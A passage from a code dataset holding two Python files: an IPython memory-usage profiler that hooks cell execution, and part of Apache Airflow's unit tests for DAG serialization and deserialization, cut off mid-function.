source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
ipython_memory_usage.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Profile mem usage envelope of IPython commands and report interactively"""
from __future__ import division # 1/2 == 0.5, as in Py3
from __future__ import absolute_import # avoid hiding global modules with locals
from __future__ import print_function # force use of print("hello")
from __future__ import unicode_literals # force unadorned strings "" to be unicode without prepending u""
import os
import time
import memory_profiler
from IPython import get_ipython
# To run: %run -i ipython_memory_usage.py
# keep a global accounting for the last known memory usage
# which is the reference point for the memory delta calculation
previous_call_memory_usage = memory_profiler.memory_usage()[0]
t1 = time.time() # will be set to current time later
keep_watching = True
peak_memory_usage = -1
watching_memory = True
input_cells = get_ipython().user_ns['In']
def start_watching_memory():
"""Register memory profiling tools to IPython instance."""
global watching_memory
watching_memory = True
ip = get_ipython()
ip.events.register("post_run_cell", watch_memory)
ip.events.register("pre_run_cell", pre_run_cell)
def stop_watching_memory():
"""Unregister memory profiling tools from IPython instance."""
global watching_memory
watching_memory = False
ip = get_ipython()
try:
ip.events.unregister("post_run_cell", watch_memory)
except ValueError:
pass
try:
ip.events.unregister("pre_run_cell", pre_run_cell)
except ValueError:
pass
def watch_memory():
# bring in the global memory usage value from the previous iteration
global previous_call_memory_usage, peak_memory_usage, keep_watching, \
watching_memory, input_cells
new_memory_usage = memory_profiler.memory_usage()[0]
memory_delta = new_memory_usage - previous_call_memory_usage
keep_watching = False
peaked_memory_usage = max(0, peak_memory_usage - new_memory_usage)
# calculate time delta using global t1 (from the pre-run event) and current
# time
time_delta_secs = time.time() - t1
num_commands = len(input_cells) - 1
cmd = "In [{}]".format(num_commands)
# convert the results into a pretty string
output_template = ("{cmd} used {memory_delta:0.4f} MiB RAM in "
"{time_delta:0.2f}s, peaked {peaked_memory_usage:0.2f} "
"MiB above current, total RAM usage "
"{memory_usage:0.2f} MiB")
output = output_template.format(time_delta=time_delta_secs,
cmd=cmd,
memory_delta=memory_delta,
peaked_memory_usage=peaked_memory_usage,
memory_usage=new_memory_usage)
if watching_memory:
print(str(output))
previous_call_memory_usage = new_memory_usage
def during_execution_memory_sampler():
import time
import memory_profiler
global keep_watching, peak_memory_usage
peak_memory_usage = -1
keep_watching = True
n = 0
WAIT_BETWEEN_SAMPLES_SECS = 0.001
MAX_ITERATIONS = 60.0 / WAIT_BETWEEN_SAMPLES_SECS
while True:
mem_usage = memory_profiler.memory_usage()[0]
peak_memory_usage = max(mem_usage, peak_memory_usage)
time.sleep(WAIT_BETWEEN_SAMPLES_SECS)
if not keep_watching or n > MAX_ITERATIONS:
# exit if we've been told our command has finished or if it has run
# for more than a sane amount of time (e.g. maybe something crashed
# and we don't want this to carry on running)
if n > MAX_ITERATIONS:
print("{} SOMETHING WEIRD HAPPENED AND THIS RAN FOR TOO LONG, THIS THREAD IS KILLING ITSELF".format(__file__))
break
n += 1
def pre_run_cell():
"""Capture current time before we execute the current command"""
import time
global t1
t1 = time.time()
# start a thread that samples RAM usage until the current command finishes
import threading
ipython_memory_usage_thread = threading.Thread(target=during_execution_memory_sampler)
ipython_memory_usage_thread.daemon = True
ipython_memory_usage_thread.start()
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: 'Hello %s' % name},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}],
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert OperatorLinks not registered via Plugins and if it is not an inbuilt Operator Link,
it can still deserialize the DAG (does not error) but just logs an error
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert extra field exists & OperatorLinks defined in Plugins and inbuilt Operator Links.
This tests also depends on GoogleLink() registered as a plugin
in tests/plugins/test_plugin.py
The function tests that if extra operator links are registered in plugin
in ``operator_extra_links`` and the same is also defined in
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
],
)
# Test all the extra_links are set
self.assertCountEqual(
simple_task.extra_links,
['BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'],
)
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
Class for testing purpose: allows to create objects with custom attributes in one single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
we want check that non-"basic" objects are turned in to strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
# The parameters we add manually in Serialization needs to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert (
BaseOperator(task_id='dummy').do_xcom_push is True
), "Precondition check! If this fails the test won't make sense"
class MyOperator(BaseOperator):
def __init__(self, do_xcom_push=False, **kwargs):
super().__init__(**kwargs)
self.do_xcom_push = do_xcom_push
op = MyOperator(task_id='dummy')
assert op.do_xcom_push is False
blob = SerializedBaseOperator.serialize_operator(op)
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert serialized_op.do_xcom_push is False
def test_no_new_fields_added_to_base_operator(self):
"""
This test verifies that there are no new fields added to BaseOperator. And reminds that
tests should be added for it.
"""
base_operator = BaseOperator(task_id="10")
fields = base_operator.__dict__
self.assertEqual(
{
'_BaseOperator__instantiated': True,
'_dag': None,
'_downstream_task_ids': set(),
'_inlets': [],
'_log': base_operator.log,
'_outlets': [],
'_upstream_task_ids': set(),
'depends_on_past': False,
'do_xcom_push': True,
'email': None,
'email_on_failure': True,
'email_on_retry': True,
'end_date': None,
'execution_timeout': None,
'executor_config': {},
'inlets': [],
'label': '10',
'max_retry_delay': None,
'on_execute_callback': None,
'on_failure_callback': None,
'on_retry_callback': None,
'on_success_callback': None,
'outlets': [],
'owner': 'airflow',
'params': {},
'pool': 'default_pool',
'pool_slots': 1,
'priority_weight': 1,
'queue': 'default',
'resources': None,
'retries': 0,
'retry_delay': timedelta(0, 300),
'retry_exponential_backoff': False,
'run_as_user': None,
'sla': None,
'start_date': None,
'subdag': None,
'task_concurrency': None,
'task_id': '10',
'trigger_rule': 'all_success',
'wait_for_downstream': False,
'weight_rule': 'downstream',
},
fields,
"""
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
ACTION NEEDED! PLEASE READ THIS CAREFULLY AND CORRECT TESTS CAREFULLY
Some fields were added to the BaseOperator! Please add them to the list above and make sure that
you add support for DAG serialization - you should add the field to
`airflow/serialization/schema.json` - they should have correct type defined there.
Note that we do not support versioning yet so you should only add optional fields to BaseOperator.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
""",
)
def test_task_group_serialization(self):
"""
Test TaskGroup serialization/deserialization.
"""
from airflow.operators.dummy import DummyOperator
from airflow.utils.task_group import TaskGroup
execution_date = datetime(2020, 1, 1)
with DAG("test_task_group_serialization", start_date=execution_date) as dag:
task1 = DummyOperator(task_id="task1")
with TaskGroup("group234") as group234:
_ = DummyOperator(task_id="task2")
with TaskGroup("group34") as group34:
_ = DummyOperator(task_id="task3")
_ = DummyOperator(task_id="task4")
task5 = DummyOperator(task_id="task5")
task1 >> group234
group34 >> task5
dag_dict = SerializedDAG.to_dict(dag)
SerializedDAG.validate_schema(dag_dict)
json_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(json_dag, dag)
serialized_dag = SerializedDAG.deserialize_dag(SerializedDAG.serialize_dag(dag))
assert serialized_dag.task_group.children
assert serialized_dag.task_group.children.keys() == dag.task_group.children.keys()
def check_task_group(node):
try:
children = node.children.values()
except AttributeError:
# Round-trip serialization and check the result
expected_serialized = SerializedBaseOperator.serialize_operator(dag.get_task(node.task_id))
